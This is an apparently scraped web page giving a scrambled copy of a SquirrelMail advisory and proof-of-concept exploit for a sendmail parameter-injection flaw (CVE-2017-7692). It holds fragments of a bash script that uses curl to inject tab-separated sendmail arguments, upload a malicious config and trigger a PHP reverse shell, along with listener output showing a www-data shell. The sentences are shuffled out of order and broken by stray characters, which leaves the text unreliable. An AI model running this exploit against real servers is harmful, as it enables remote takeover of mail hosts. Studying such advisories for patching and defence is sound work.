The vulnerability was first reported to SquirrelMail vendor by theĪuthor of this advisory which resulted in CVE-ID (2017-5181) issued on 4th The latest version of SquirrelMail 1.4.22 and below are affected.
#SQUIRRELMAIL AUTHENTICATED USER FULL#
Lead to a full compromise of the web application. The target server in the context of the web server account which could
Ii squirrelmail 2:1.4.23~svn20120406-2ubuntu1.16.04.1 all Webmail for exitĪ successful exploitation could let remote attackers to gain access to Uid=33(www-data) gid=33(www-data) dpkg -l | grep squirrelmail Listening on (family 0, port 1337)Ĭonnection from port 1337 accepted (family 2, sport 60608)īash: cannot set terminal process group (12208): Inappropriate ioctl for device
#SQUIRRELMAIL AUTHENTICATED USER CODE#
Logging in to SquirrelMail at Uploading Sendmail configĢ - Remote Code Execution (with the uploaded smcnf-exp + phpsh) SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) (sleep 2s & curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" -d"subject=poc" -data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &Įcho -e "\n Waiting for shell on $reverse_ip port $reverse_port"Įcho -e "\n The test file should have been written at /tmp/sqpoc"Įcho "There was a problem with sending email" # Send email which triggers the RCE vuln and runs phprevshĮcho -e "\n Sending the email to trigger the vuln" Token="`curl -s -b"SQMSESSID=$sessid key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '' | cut -d'"' -f1 `"Ĭurl -s -b"SQMSESSID=$sessid key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" -data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/nullĮcho "Failed to inject sendmail parameters" System(\"/bin/bash /tmp/cmd rm -f /tmp/cmd\") Įcho -e "\n Injecting Sendmail command parameters" Provide a malicious sendmail config file which can be uploaded as an attachment to Which will result in /tmp/sqpc file created on disk with email log (-X parameterĬauses sendmail to save the debug/maillog into a file).Īs demonstrated by the PoC exploit below, attacker can also inject -Cparameter to The sendmail program will be called with the following arguments: If attacker sets their email address (Return-Path) in the options -oQ/tmp/ -X/tmp/sqpoc Used by attackers to inject additional parameters. Unfortunately it does not take into account \t (TAB) character which can be Injection of additional parameters to the sendmail command. SquirrelMail allows authenticated users to control envelopefrom (Return-Path) addressĪs we can see it calls str_replace() to sanitize the user input to prevent $stream = popen(escapeshellcmd($this->sendmail_command), "w") $this->sendmail_command = "$sendmail_path $this->sendmail_args -f$envelopefrom"
save executed command for future reference
0 kommentar(er)
